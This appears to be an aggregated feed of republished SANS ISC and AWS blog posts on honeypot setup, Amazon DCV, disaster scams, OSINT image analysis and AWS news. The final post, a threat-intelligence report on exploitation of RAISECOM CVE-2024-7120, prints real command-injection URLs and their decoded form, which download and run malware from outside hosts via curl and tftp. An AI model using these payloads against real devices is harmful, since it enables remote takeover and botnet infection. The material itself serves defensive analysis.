Kickstart Your DShield Honeypot [Guest Diary], (Thu, Oct 3rd)

This post was originally published on this site

[This is a Guest Diary by Joshua Gilman, an ISC intern as part of the SANS.edu BACS program]

Introduction

Setting up a DShield honeypot is just the beginning. The real challenge lies in configuring all the necessary post-installation settings, which can be tedious when deploying multiple honeypots. Drawing from personal experience and valuable feedback from past interns at the Internet Storm Center (ISC), I developed DShieldKickStarter to automate this often repetitive and time-consuming process.

What is DShieldKickStarter?

DShieldKickStarter is not a honeypot deployment tool. Instead, it’s a post-installation configuration script designed to streamline the setup of a honeypot environment after the DShield honeypot software has been installed. The script ensures that honeypots run efficiently with minimal manual effort by automating essential tasks such as setting up log backups, PCAP capture, and installing optional analysis tools.

Key Features of DShieldKickStarter

•    Automated Log Backups: The script organizes, compresses, and password-protects honeypot logs to prevent accidental execution of malicious files.
•    PCAP Capture Setup: Using tcpdump, it captures network traffic while excluding specific ports, ensuring relevant data is logged.
•    Optional Tool Installation: Cowrieprocessor and JSON-Log-Country are included as optional tools. Both were invaluable during my internship for streamlining data analysis.
•    Helpful for Multiple Honeypots: This script is handy when managing several honeypots. It saves time by automating repetitive setup tasks.

Step-by-Step Breakdown

The script automates several critical tasks:
1.    Creating Directories and Setting Permissions 
            Ensures the necessary directory structures for logs, backups, and PCAP data are in place, with proper permissions to secure sensitive files.
2.    Installing Required Packages 
             Installs essential tools such as tcpdump, git, and python3-pip, streamlining the log and packet capture setup.
3.    Configuring Log Rotation and Backups 
             Automatically rotates logs and stores them with password protection. PCAP files and honeypot logs are archived daily, and older backups are cleaned to save space.
4.    Automating PCAP Capture 
             Sets up tcpdump to capture network traffic, excluding predefined ports to ensure relevant data capture. The process is automated via cron jobs.
5.    Optional Tool Integration 
             The script optionally installs cowrieprocessor and JSON-Log-Country, two tools that were extremely helpful during my internship. These streamline log processing and help categorize attack data for further analysis.
6.    SCP Option for Off-Sensor Backup 
             If enabled, the script supports SCP transfers to a remote server, automating the secure transfer of backups for off-sensor storage.

Who Benefits from This?

•    ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection.
•    Cybersecurity Professionals: This tool's time-saving features can benefit anyone interested in setting up a DShield honeypot and contributing to threat intelligence efforts.

Tool Showcase

1. CowrieProcessor

Description

CowrieProcessor is a Python tool designed to process and summarize Cowrie logs, allowing for more accessible and detailed analysis. Cowrie logs can contain overwhelming data as they track every interaction with the honeypot. CowrieProcessor condenses this data into a readable format, focusing on crucial elements like session details, IP addresses, commands entered by attackers, and malicious files downloaded during the session.

Usage and Benefits

The tool automates the parsing of Cowrie logs, providing a summary that includes key metrics such as session duration, attacker IPs, and the commands used during each attack. This is useful for quickly understanding attacker behavior without sifting through massive raw log files. With this, security teams can focus on actionable insights, such as blocking specific IPs or analyzing downloaded malware.

Screenshot Explanation

In the attached screenshot, CowrieProcessor provides a detailed view of a session from an attack on the honeypot. It shows session details, commands attempted by the attacker, and files downloaded, such as the malicious authorized_keys file. The easy-to-read output from CowrieProcessor highlights the attack flow, giving you insight into the malicious actor’s intentions.


CowrieProcessor output showing session details and malicious activities detected by the honeypot.

DShield SIEM (ELK)

Description

While DShield SIEM (ELK) is not included in the script, it is crucial in further analysis and data visualization for honeypots. ELK (Elastic Stack) enables the collection, processing, and real-time visualization of honeypot data. It provides a centralized platform to track attacker behavior, detect patterns, and generate insights through interactive dashboards.

Usage and Benefits

Using ELK, you can monitor key metrics such as the most frequent attacker IPs, session types, and the commands attackers use. ELK dashboards also provide the ability to create custom queries using Kibana Query Language (KQL), which allows you to filter logs by specific attributes like failed logins, session durations, or malicious file downloads.


ELK dashboard showing attack data, top IP addresses, session activity, and trends over time.

Screenshot Explanation

The attached screenshot shows a detailed ELK dashboard summarizing honeypot data. On the left side, the "Top 50 IP" table displays the most active attacking IPs, while the center pie charts break down the types of logs (honeypot, webhoneypot, etc.) and session activity. The bar chart on the right visualizes Cowrie activity over time, helping analysts track attack patterns. KQL can filter this data even further, focusing on specific attacks or malicious behaviors.

KQL (Kibana Query Language)

One of the standout features of ELK is the ability to leverage KQL for deep-dive investigations. For instance, if you want to search for all failed login attempts, you can use a KQL query like:
event.outcome: "login.failed"

This query will instantly filter your logs, allowing you to pinpoint where and when login attempts failed. Another useful query might be filtering by source IP to track all actions from a particular attacker:
source.ip: "45.148.10.242"

With KQL, you can quickly analyze data across large volumes of logs, making it easy to detect anomalies, potential threats, or patterns in attacker behavior.

[1] https://github.com/DShield-ISC/dshield
[2] https://github.com/iamjoshgilman/DShieldKickStarter
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://github.com/justin-leibach/JSON-Log-Country
[5] https://github.com/bruneaug/DShield-SIEM
[6] https://www.elastic.co/guide/en/kibana/current/kuery-query.html
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security related Docker containers, (Wed, Oct 2nd)

This post was originally published on this site

Over the last 9 months or so, I've been putting together some docker containers that I find useful in my day-to-day malware analysis and forensicating. I have been putting them up on hub.docker.com and decided, I might as well let others know they were there. In a couple of cases, I just found it easier to create a docker container than try to remember to switch in and out of a Python virtualenv. In a couple of other cases, it avoids issues I've had with conflicting version of installed packages. In every case, I'm tracking new releases so I can update my containers when new releases come out and I usually do so within a couple of days of the new release. The ones that I have up at the moment are the following:

NICE DCV is now Amazon DCV with 2024.0 release

This post was originally published on this site

Today, NICE DCV has a new name. So long NICE DCV, welcome Amazon DCV. Today, with the 2024.0 release, along with enhancements and bug fixes, NICE DCV is rebranded to Amazon DCV.

The new name is now also used to consistently refer to the DCV protocol powering AWS managed services such as Amazon AppStream 2.0 and Amazon WorkSpaces.

What is Amazon DCV
Amazon DCV is a high-performance remote display protocol. It lets you securely deliver remote desktops and application streaming from any cloud or data center to any device, over varying network conditions. By using Amazon DCV with Amazon Elastic Compute Cloud (Amazon EC2), you can run graphics-intensive applications remotely on EC2 instances. You can then stream the results to more modest client machines, which eliminates the need for expensive dedicated workstations.

Amazon DCV supports both Windows and major flavors of Linux operating systems on the server side, providing you flexibility to fit your organization’s needs. The client-side that receives the desktops and application streamings could be the native DCV client for Windows, Linux, or macOS or web browsers. The DCV remote server and client transfer only encrypted pixels, not data, so no confidential data is downloaded from the DCV server. When you choose to use Amazon DCV on Amazon Web Services (AWS) with EC2 instances, you can take advantage of the AWS 108 Availability Zones across the 33 geographic Regions and 31 local zones, allowing your remote streaming services to scale globally.

Since Amazon acquired NICE 8 years ago, we’ve witnessed a diverse range of customers adopting DCV. From general-purpose users visualizing business applications to industry-specific professionals, DCV has proven to be versatile. For instance, artists have employed DCV to access powerful cloud workstations for their digital content creation and rendering tasks. In the healthcare sector, medical imaging professionals have used DCV for remote visualization and analysis of patient data. Geoscientists have used DCV to analyze reservoir simulation results, while engineers in manufacturing have used it to visualize computational fluid dynamics experiments. The education and IT support industries have benefited from collaborative sessions in DCV, in which multiple users can share a single desktop.

Notable customers include Quantic Dream, an award-winning game development studio that has harnessed DCV to create high-resolution, low-latency streaming services for their artists and developers. Tally Solutions, an enterprise resource planning (ERP) services provider, has employed DCV to securely stream its ERP software to thousands of customers. Volkswagen has used DCV to provide remote access to computer-aided engineering (CAE) applications for over 1,000 automotive engineers. Amazon Kuiper, an initiative to bring broadband connectivity to underserved communities, has used DCV for designing complex chips.

Within AWS, DCV has been adopted by several services to provide managed solutions to customers. For example, AppStream 2.0 uses DCV to offer secure, reliable, and scalable application streaming. Additionally, since 2020, Amazon WorkSpaces Streaming Protocol (WSP), which is built on DCV and optimized for high performance, is available for Amazon WorkSpaces customers. Today, we’re also phasing out the WSP name and replacing it with DCV. Going forward, you will have DCV as a primary protocol choice in Amazon WorkSpaces.

What’s new with version 2024.0
Amazon DCV 2024.0 introduces several fixes and enhancements for improved performance, security, and ease of use. The 2024.0 release now supports the latest Ubuntu 24.04 LTS, bringing the latest security updates and extended long-term support to simplify system maintenance. The DCV client on Ubuntu 24.04 has built in support for Wayland, offering better graphical rendering efficiency and enhanced application isolation. Additionally, DCV 2024.0 now enables the QUIC UDP protocol by default, allowing clients to benefit from an optimized streaming experience. The release also introduces the capability to blank the Linux host screen when a remote user is connected, preventing local access and interaction with the remote session.

How to get started
The easiest way to test DCV is to spin up a WorkSpaces instance from the WorkSpaces console, selecting one of the DCV-powered bundles, or creating an AppStream session. For this demo however, I want to show you how to install DCV server on an EC2 instance.

I installed DCV server on two servers running on Amazon EC2, one running Windows Server 2022 and one running Ubuntu 24.04. I also installed the client on my macOS laptop. The client and server packages are available to download on our website. For both servers, make sure the security group authorizes inbound connection on UDP or TCP port 8443, the default port DCV uses.

The Windows installation is straightforward: start the msi file, select Next at each step and voilà. It was installed in less time than it took me to write this sentence.

The installation on Linux deserves a bit more care. Amazon Machine Images (AMI) for EC2 servers don’t include any desktop or graphical components. As a prerequisite, I had to install the X Window System and a window manager, and configure X to let users connect and start a graphical user interface session on the server. Fortunately, all these steps are well documented. Here is a summary of the commands I used.

# install desktop packages 
$ sudo apt install ubuntu-desktop

# install a desktop manager 
$ sudo apt install gdm3

# reboot
$ sudo reboot

After the reboot, I installed the DCV server package

# Install the server 
$ sudo apt install ./nice-dcv-server_2024.0.17794-1_amd64.ubuntu2404.deb
$ sudo apt install ./nice-xdcv_2024.0.625-1_amd64.ubuntu2404.deb

# (optional) install the DCV web viewer to allow clients to connect from a web browser
$ sudo apt install ./nice-dcv-web-viewer_2024.0.17794-1_amd64.ubuntu2404.deb

Because my server had no GPU, I also followed these steps to install X11 Dummy driver and configure X11 to use it.

Then, I started the service:

$ sudo systemctl enable dcvserver.service 
$ sudo systemctl start dcvserver.service 
$ sudo systemctl status dcvserver.service 

I created a user at the operating system level and assigned a password and a home directory. Then, I checked my setup on the server before trying to connect from the server.

$ sudo dcv list-sessions
There are no sessions available.

$ sudo dcv create-session console --type virtual --owner seb

$ sudo dcv list-sessions
Session: 'console' (owner:seb type:virtual)

Once my server configuration was ready, I started the DCV client on my laptop. I only had to enter the IP address of the server and the username and password of the user to initiate a session.

DCV Client - enter ip address DCV Client enter username and apssword

On my laptop, I opened a new DCV client window and connected to the other EC2 server. After a few seconds, I was able to remotely work with the Windows and the Ubuntu machine running in the cloud.

DCV two clients from macOS

In this example, I focus on installing Amazon DCV on a single EC2 instance. However, when building your own service infrastructure, you may want to explore the other components that are part of the DCV offering: Amazon DCV Session Manager, Amazon DCV Access Console, and Amazon DCV Connection Gateway.

Pricing and availability
Amazon DCV is free of charges when used on AWS. You only pay for the usage of AWS resources or services, such as EC2 instances, Amazon Workspace desktops, or Amazon App Stream 2.0. If you plan to use DCV with on-premises servers, check the list of license resellers on our website.

Now go build your own servers with DCV.

— seb

Hurricane Helene Aftermath – Cyber Security Awareness Month, (Tue, Oct 1st)

This post was originally published on this site

For a few years now, October has been "National Cyber Security Awareness Month". This year, it is a good opportunity for a refresher on some scams that tend to happen around disasters like Hurricane Helene. The bigger the disaster, the more attractive it is to scammers.

Fake Donation Sites

Hurricane Katrina was the first event that triggered many fake donation websites. Since then, the number of fake donation websites has decreased somewhat, partly due to law enforcement attention and hopefully due to people becoming more aware of these scams. These scams either pretend to be a new charity/group attempting to help or impersonate an existing reputable charity. People in affected areas need help. Please only donate to groups you are familiar with and who were active before the event.

AI Social Media Posts

I believe these posts are mostly created to gain social media followers, maybe with the intent to later reel them into some scam. They often post dramatic images created with AI tools or copied from legitimate accounts. Some may just be interested in some of the monetization schemes social media and video sites are participating. Do not amplify these accounts. Strictly speaking, they are not "fake news," but legitimate news sources who go out to take pictures and gather information need exposure more than these fake accounts. Often, the fake accounts will contribute to at least exaggeration of the impact of the event and reduce, in some cases, the credibility of legitimate recovery efforts

Malware

Attackers may use the event as a pretense to trick victims into opening attachments. In the past, we have seen e-mails and websites that spread malware claiming to include videos or images of the event. These attachments turn out to be executables installing malware.

Fake Assistance Scams

In the aftermath of a disaster, organizations often provide financial aid through loans. Scammers will apply for these loans using stolen identities traded online. If it may take several months for the victim to become aware of this, they often face a request to repay the loan. Sadly, there is not much, if anything, to protect yourself from these scams. The intend of the assistance is to be quick and unburocratic and to "sort things out later". You may have to prove that someone else used your information to apply for the loan.

"Grandparent Scam"

In this scam, a caller will pretend to be a relative or close friend, asking for money. These scams have improved because they can often identify individuals in the disaster area and use them as a pretense to extort money. The caller may claim to be the individual (often they use SMS or other text messaging services), or they may claim to represent a police department or a hospital. Do not respond to any demands for money. Notify your local police department. If you are concerned, try to reach out to the agency calling you using a published number (note that Google listings can be fake). Due to the conditions in affected areas, the local authorities may be unable to respond. Your local law enforcement agency may be able to assist. They often have a published "non-emergency" number you can use instead of 911. Individuals in the affected area may not be reachable due to spotty power and cell service availability.

Final Word

Please let us know if we missed anything. A final word on some disaster preparedness items with an "IT flavor":Broken high voltage power line wire touching cable TV and phone lines.

  1. Have a plan to get out, and if you can get out: get out. You should not stay in the affected area unless you are part of the recovery effort.
  2. Cellular networks fail. Cellular networks tend to work pretty well during smaller disasters, but they need power, towers, and other infrastructure, which will fail in large-scale disasters. Satellite connectivity quickly becomes your only viable option (if you have power). If you have a phone with satellite emergency calling (for example, a recent iPhone), they offer a "demo mode" to familiarize you with the feature.
  3. If you are lucky to already have a Starlink setup, bring the antenna inside before the storm and disconnect the equipment from power to avoid spikes destroying it.
  4. Disconnect as many electric devices from outlets as possible during a power outage (or before power outages are expected). Power outages often come with power spikes and other irregular power events that can destroy sensitive electronics. Do not plug them back in until power is restored and stable.
  5. Even a downed phone or cable TV line can be energized. You may not see the high voltage line that is also down and touches the cable TV line. I took the picture on the right this weekend in my neighborhood of a high-voltage line touching the cable TV and phone line.

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Tool update: mac-robber.py and le-hex-to-ip.py, (Mon, Sep 30th)

This post was originally published on this site

One of the problems I've had since I originally wrote mac-robber.py [1][2][3] seven years ago is that because of the underlying os.stat python library we couldn't get file creation times (B-times). Since the release of GNU coreutils 8.32 (or so), the statx() call has been available on Linux to provide the B-time, but Python out of the box doesn't yet support that call. Recently, though, I did some searches and discovered that for several years there has actually bin a pip package called pystatx that exposes the statx() call and allows us to get the B-time. So, I updated the script. It now tries to import statx and if it succeeds (probably only on relatively recent Linux distros where the pip package has been installed) it can now provide B-times. I also adjusted the formatting so the script will now give microsecond instead of millisecond resolution. I will probably write a python version of mactime at some point so that we can actually take advantage of the additional resolution.

AWS Weekly Roundup: Jamba 1.5 family, Llama 3.2, Amazon EC2 C8g and M8g instances and more (Sep 30, 2024)

This post was originally published on this site

Every week, there’s a new Amazon Web Services (AWS) community event where you can network, learn something new, and immerse yourself in the community. When you’re in a community, everyone grows together, and no one is left behind. Last week was no exception. I can highlight the Dach AWS Community Day where Viktoria Semaan closed with a talk titled How to Create Impactful Content and Build a Strong Personal Brand, and the Peru User Group, who organized two days of talks and learning opportunities: UGCONF & SERVERLESSDAY 2024, featuring Jeff Barr, who spoke about how to Create Your Own Luck. The community events continue, so check them out at Upcoming AWS Community Days.

Last week’s launches
Here are the launches that got my attention.

Jamba 1.5 family of models by AI21 Labs is now available in Amazon Bedrock – The Jamba 1.5 Large and 1.5 Mini models feature a 256k context window, one of the longest on the market, enabling complex tasks like lengthy document analysis. With native support for structured JSON output, function calling, and document processing, they integrate into enterprise workflows for specialized AI solutions. To learn more, read Jamba 1.5 family of models by AI21 Labs is now available in Amazon Bedrock, visit the AI21 Labs in Amazon Bedrock page, and read the documentation.

AWS Lambda now supports Amazon Linux 2023 runtimes in AWS GovCloud (US) Regions – These runtimes offer the latest language features, including Python 3.12, Node.js 20, Java 21, .NET 8, Ruby 3.3, and Amazon Linux 2023. They have smaller deployment footprints, updated libraries, and a new package manager. Additionally, you can also use the container base images to build and deploy functions as a container image.

Amazon SageMaker Studio now supports automatic shutdown of idle applications – You can now enable automatic shutdown of inactive JupyterLab and CodeEditor applications using Amazon SageMaker Distribution image v2.0 or newer. Administrators can set idle shutdown times at domain or user profile levels, with optional user customization. This cost control mechanism helps avoid charges for unused instances and is available across all AWS Regions where SageMaker Studio is offered.

Amazon S3 is implementing a default 128 KB minimum object size for S3 Lifecycle transition rules to any S3 storage class – Reduce transition costs for datasets with many small objects by decreasing transition requests. Users can override the default and customize minimum object sizes. Existing rules remain unchanged, but the new default applies to new or modified configurations.

AWS Lake Formation centralized access control for Amazon Redshift data sharing is now available in 11 additional Regions – Enabling granular permissions management, including table, column, and row-level access to shared Amazon Redshift data. It also supports tag-based access control and trusted identity propagation with AWS IAM Identity Center for improved security and simplified management.

Llama 3.2 generative AI models now available in Amazon Bedrock – The collection includes 90B and 11B parameter multimodal models for sophisticated reasoning tasks, and 3B and 1B text-only models for edge devices. These models support vision tasks, offer improved performance, and are designed for responsible AI innovation across various applications. These models support a 128K context length and multilingual capabilities in eight languages. Learn more about it in Introducing Llama 3.2 models from Meta in Amazon Bedrock.

Share AWS End User Messaging SMS resources across multiple AWS accounts – You can use AWS Resource Access Manager (RAM), to share phone numbers, sender IDs, phone pools, and opt-out lists. Additionally, Amazon SNS now delivers SMS text messages through AWS End User Messaging, offering enhanced features like two-way messaging and granular permissions. These updates provide greater flexibility and control for SMS messaging across AWS services.

AWS Serverless Application Repository now supports AWS PrivateLink Enabling direct connection from Amazon Virtual Private Cloud (VPC) without internet exposure. This enhances security by keeping communication within the AWS network. Available in all Regions where AWS Serverless Application Repository is offered, it can be set up using the AWS Management Console or AWS Command Line Interface (AWS CLI).

Amazon SageMaker with MLflow now supports AWS PrivateLink for secure traffic routing – Enabling secure data transfer from Amazon Virtual Private Cloud (VPC) to MLflow Tracking Servers within the AWS network. This enhances protection of sensitive information by avoiding public internet exposure. Available in most AWS Regions, it improves security for machine learning (ML) and generative AI experimentation using MLflow.

Introducing Amazon EC2 C8g and M8g Instances – Enhanced performance for compute-intensive and general-purpose workloads. With up to three times more vCPUs, three times more memory, 75 percent more memory bandwidth, and two times more L2 cache, these instances improve data processing, scalability, and cost-efficiency for various applications including high performance computing (HPC), batch processing, and microservices. Read more in Run your compute-
intensive and general purpose workloads sustainably with the new Amazon EC2 C8g, M8g instances.

Llama 3.2 models are now available in Amazon SageMaker JumpStart – These models offer various sizes from 1B to 90B parameters, support multimodal tasks, including image reasoning, and are more efficient for AI workloads. The 1B and 3B models can be fine-tuned, while Llama Guard 3 11B Vision supports responsible innovation and system-level safety. Learn more in Llama 3.2 models from Meta are now available in Amazon SageMaker JumpStart.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS news
Here are some additional projects, blog posts, and news items that you might find interesting:

Deploy generative AI agents in your contact center for voice and chat using Amazon Connect, Amazon Lex, and Amazon Bedrock Knowledge Bases – This solution enables low-latency customer interactions, answering queries from a knowledge base. Features include conversation analytics, automated testing, and hallucination detection in a serverless architecture.

How AWS WAF threat intelligence features help protect the player experience for betting and gaming customersAWS WAF enhances bot protection for betting and gaming. New features include browser fingerprinting, automation detection, and ML models to identify coordinated bots. These tools combat scraping, fraud, distributed denial of service (DDoS) attacks, and cheating, safeguarding player experiences.

How to migrate 3DES keys from a FIPS to a non-FIPS AWS CloudHSM cluster – Learn how to securely transfer Triple Data Encryption Algorithm (3DES) keys from Federal Information Processing Standard (FIPS) hsm1 to non-FIPS hsm2 clusters using RSA-AES wrapping, without backups. This enables using new hsm2.medium instances with FIPS 140-3 Level 3 support, non-FIPS mode, increased key capacity, and mutual TLS (mTLS).

Upcoming AWS events
Check your calendars and sign up for upcoming AWS events:

AWS Summits – Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. These events offer technical sessions, demonstrations, and workshops delivered by experts. There is only one event left that you can still register for: Ottawa (October 9).

AWS Community Days – Join community-led conferences featuring technical discussions, workshops, and hands-on labs driven by expert AWS users and industry leaders from around the world. Upcoming AWS Community Days are scheduled for October 3 in the Netherlands and Romania, and on October 5 in Jaipur, Mexico, Bolivia, Ecuador, and Panama. I’m happy to share with you that I will be joining the Panama community on October 5.

AWS GenAI Lofts – Collaborative spaces and immersive experiences that showcase AWS’s expertise with the cloud and AI, while providing startups and developers with hands-on access to AI products and services, exclusive sessions with industry leaders, and valuable networking opportunities with investors and peers. Find a GenAI Loft location near you and don’t forget to register. I’ll be in the San Francisco lounge with some demos on October 15 at the Gen AI Developer Day. If you’re attending, feel free to stop by and say hello!

Browse all upcoming AWS led in-person and virtual events and developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Thanks to Dmytro Hlotenko and Diana Alfaro for the photos of their community events.

Eli

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!

OSINT – Image Analysis or More Where, When, and Metadata [Guest Diary], (Wed, Sep 25th)

This post was originally published on this site

[This is a Guest Diary by Thomas Spangler, an ISC intern as part of the SANS.edu BACS program]

A picture is worth a thousand words, as the saying goes. Using open-source information and basic image analysis can be an valuable tool for investigators. The purpose of this blog is to demonstrate the power of image analysis and the associated tools for open-source intelligence (OSINT). Having recently completed SANS SEC497, I was inspired to share the power of image analysis in providing valuable information for investigations. This post will provide a step-by-step approach using a random image [1] pulled from the internet.

SAFETY FIRST

Always scan a file or URL prior to retrieving a target image. This action is particularly useful when retrieving information from suspicious or unknown websites. A tool like VirusTotal [2] makes this step very easy.

First, select your scan type:  File, URL, or Search.  In the case of a file, it can be dragged and dropped on the screen.

In this case, I used a known PDF file to generate the sample result shown below.

Now we are clear to proceed with the image analysis…

TARGET IMAGE

Our target image was randomly selected from the NY Times website.

Credit: Filip Singer, EPA

WHERE WAS THIS IMAGE TAKEN

A natural first question might be:  where this image was taken?  OSINT analysts use many tools, including image analysis, to answer questions like this one.   As you will see, image analysis alone cannot solve this question.  Other tools like Google searches, translation tools, and metadata can be combined with image analysis to provide discrete clues that integrate together into an answer.

Potentially identifiable or unique markings…

In looking for image clues, focus on context (e.g. bridge collapse and flooding), unique markers (e.g. signs, buildings, bridges), and geography.

With these clues in hand, we can now use tools like Google Lens [3] and Yandex [4] (if your organization or agency permits its use because of the Russian origin) for reverse image lookups and text-based searches.  While most people think of Google searches in terms of text, Google Lens is the image search equivalent, which can be used to find additional clues.  In this case, I used Google Lens with the original image and the image clues mentioned above to find relevant matches.  Below are the Google Lens matches obtained from a search on the original image:

From the Google Lens results, the images from www.lusa.pt  and TAG24 seem to be similar matches.  Note the TAG24 description indicated Dresden and is written in German.  Upon visiting the TAG24 website [5], we find a different image of the same location and an article in German.  

Using another important OSINT tool, Google Translate, we can translate some of the text to English in order to find the exact bridge and location in question.

Voila…Carola Bridge.  A simple Google text search on Carola Bridge turns up an article from Euronews [6] that confirms the image location at the Carola Bridge in Dresden, Germany.  We can also use a Google Dork…maps:carola bridge…to find a map of the location:

WHEN

From the Euronews article, we also know that the bridge collapsed sometime between 11-12 September 2024 in the middle of the night.

An AP Article [7] that also turned up in the previous google search indicated that “crews were alerted around 3am”.  And, an Engineering News Record article [8] confirms the collapse occurred on 11 September 2024. A Deutche Welle article confirms that demolition of the fallen structure began on 13 September 2024.

We can conclude that this picture was taken sometime between 3am local time on 11 Sept 2024 and daylight hours on 13 Sept 2024.  With further investigation, using Google Street View and similar tools, we could have probably narrowed the timeline down even further.

METADATA

I wanted to touch on one other important topic…metadata.  Metadata (as shown in the details below from the reference image) presents interesting information such as location, size, imaging device, date, and time for the image in question.  Original images, videos, and files usually contain a treasure chest of information in the form of metadata.  Using Exiftool [10], the following data is returned on the target file in this blog:

It includes some basic information about the image size, encoding process, etc., but with original images, location, camera type, date, and time will all likely be included.  These pieces of metadata could drastically speed up any OSINT investigation.

CONCLUSION

In conclusion, imagery can be an important starting point for OSINT investigations.  However, more cyber tools than just image analysis must be employed to answer some basic questions like who, where, and when.  In certain cases, an analyst needs to pay close attention to their own attribution (“being found”) when conducting an investigation.  Instead of using live web searches from a local machine, an analyst may need to use sock puppet accounts, VPN protection, and/or cloud-based hosts and even tools like Google Cache and the Wayback Machine for archived web sites to protect their identities and the fact that a target is being investigated.

Thank you to SEC497 instructor Matt Edmondson for peaking my interest in OSINT and the skills developed during the course.

[1] nytimes.com
[2] virustotal.com
[3] https://chromewebstore.google.com/detail/download-google-lens-for/miijkofiplfeonkfmdlolnojlobmpman?hl=en
[4] Yandex.com/images
[5] https://www.tag24.de/thema/naturkatastrophen/hochwasser/hochwasser-dresden/hochwasser-in-dresden-pegel-prognosen-werden-sich-bestaetigen-3317729#google_vignette
[6] https://www.euronews.com/my-europe/2024/09/12/major-bridge-partially-collapses-into-river-in-dresden
[7] https://apnews.com/article/dresden-germany-bridge-collapse-carola-bridge-ad1ebf71f396d8984d2e79f9e6ba3f06
[8] https://www.enr.com/articles/59283-dramatic-bridge-failure-surprises-dresden-germany-officials
[9] https://www.dw.com/en/dresden-rushes-to-remove-collapsed-bridge-amid-flood-warning/a-70215802
[10] https://exiftool.org/
[11] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Exploitation of RAISECOM Gateway Devices Vulnerability CVE-2024-7120, (Tue, Sep 24th)

This post was originally published on this site

image of SOH/Enterprise Gateway Raisecom MSG2200 series, msg2100E series.Late in July, a researcher using the alias "NETSECFISH" published a blog post revealing a vulnerability in RASIECOM gateway devices [1]. The vulnerability affects the "vpn/list_base_Config.php" endpoint and allows for unauthenticated remote code execution. According to Shodan, about 25,000 vulnerable devices are exposed to the internet.

With a simple proof of concept available, it is no surprise that we aseethe vulnerability exploited. The first exploits were detected by our sensors on September 1st

The graph above shows the number of attacks for this vulnerability we saw daily.

There are two distinct payloads that we have seen used so far:

 /vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20rm%20-rf%20tplink%3B%20curl%20http%3A//[redacted]/tplink%20--output%20tplink%3B%20chmod%20777%20tplink%3B%20./tplink%20raisecom%60

This decoded to the following script:

cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

The second URL looks quite similar

/vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20tftp%20-g%20-r%20ppc%20141.98.11.136%2069%3B%20chmod%20777%20ppc%3B%20./ppc%20raisee%60

Decoding to:

cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

Interestingly, the second attempt uses TFTP, not HTTP, to download the malware. Sadly, neither file was available at the time I am writing this. But based on the naming of the files, it is fair to assume that this is one of the regular botnets hunting for vulnerable routers.

I was not able to find details about this vulnerability or patches on RAISECOM's website [2].

[1] https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707
[2] https://en.raisecom.com/product/sohoenterprise-gateway


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.